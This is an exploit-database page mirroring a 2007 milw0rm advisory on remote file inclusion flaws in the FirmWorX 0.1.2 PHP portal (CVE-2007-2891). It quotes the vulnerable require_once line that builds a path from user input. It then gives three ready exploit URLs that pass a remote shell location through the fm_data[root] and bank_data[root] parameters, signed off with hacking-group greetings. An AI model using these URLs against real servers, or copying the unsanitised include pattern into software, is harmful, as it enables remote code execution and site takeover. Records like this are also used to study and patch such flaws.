[] NeoSense
E X P L O I T S
title author type platform port cve id

FirmWorX 0.1.2 - Multiple Remote File Inclusions

Author: DeltahackingTEAM
type: webapps
platform: php
port: 
date_added: 2007-05-23 
date_updated: 2016-10-05 
verified: 1 
codes: OSVDB-38059;CVE-2007-2891;OSVDB-38058;OSVDB-38057 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comFirmWorX_0.1.2.zip
**********************************************************************************************************
                                              DeltaSecurityTEAM
                                              WwW.DeltaSecurity.iR
**********************************************************************************************************

* Portal Name = FirmWorX 0.1.2

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Download = http://firmworx.sourceforge.net

* Discoverd By = DeltahackingTEAM

* User In Delta Team = Dav00d_Cracker

* Conatact = Davood_cracker@yahoo.com

--------------------------------------------------------------------------------------------

Vulnerability C0de :


require_once($fm_data['root']."/includes/config/db.inc.php");

--------------------------------------------------------------------------------------------

- Expl0it:

http://localhost/[PATH]/includes/config/master.inc.php?fm_data[root]=Shellz?
http://localhost/[PATH]/includes/functions/master.inc.php?fm_data[root]=Shellz?
http://localhost/[PATH]/modules/bank/includes/design/main.inc.php?bank_data[root]=Shellz?

--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , And all I

**********************************************************************************************************

# milw0rm.com [2007-05-24]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.